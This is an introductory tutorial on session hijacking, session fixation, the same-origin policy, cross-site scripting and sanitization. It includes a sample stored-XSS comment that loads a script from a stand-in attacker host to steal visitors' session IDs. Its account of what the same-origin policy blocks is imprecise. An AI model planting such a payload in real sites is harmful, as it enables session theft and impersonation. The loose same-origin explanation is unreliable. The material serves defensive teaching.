Session Hijacking
There are many ways to compromise session security. Here, we’ll take a closer look at session hijacking and some ways to make it more difficult.
Session hijacking refers to a malicious user gaining unauthorized access to a user’s SID, and using that SID to impersonate the user in a session.
There are many sophisticated ways to hijack sessions, in particular various uses of packet sniffing. But one of the simpler ways is to send an email to a user a link to a site that the user might have an account on. This link will add a query parameter with a specified session id, e.g. http://mybank.com?SID=some_known_value. If the user of the email gets tricked into logging onto the site, then the unauthorized user will have access to the session as well. This is called a session fixation attack.
Same-Origin Policy
A first-line defense against session hijacking is the same-origin policy. A page’s origin is a combination of its URL’s scheme, host name, and port number. The same-origin policy states that scripts contained in a web page may access data in another web page only if both web pages have the same origin. For example, suppose a user logs into a banking application. Suppose further that the user then navigates to a malicious page in another browser tab, and sends a request to that page’s server (clicks a link, for example). In this case, the request wouldn’t originate on the banking server, so same-origin policy would disallow the request.
Cross-Site Scripting
Cross-site scripting, or XSS, is another form of session hijacking. Cross-site scripting circumvents the same-origin policy, because the page that the server sent to the browser is the same page that sends the request for authorization cookies.
For example, a malicious user could enter this comment into a blog site:
|
1 2 3 |
What a great idea!<script src="myevilsite.com/stealauth.js"></script> |
That comment permanently embeds the script into that page, and all that shows is “What a great idea!”. This means that anyone loading the page also executes stealauth.js, a javascript program that sends the SID of whoever has loaded the page to the malicious user. That malicious user can then use that SID to impersonate the legitimate user on the site.
Sanitization
Sanitization of user input is the usual way to combat cross-site scripting attacks. One common sanitization technique is to disallow <script> tags in comments. Doing this would prevent the malicious posting in the above example.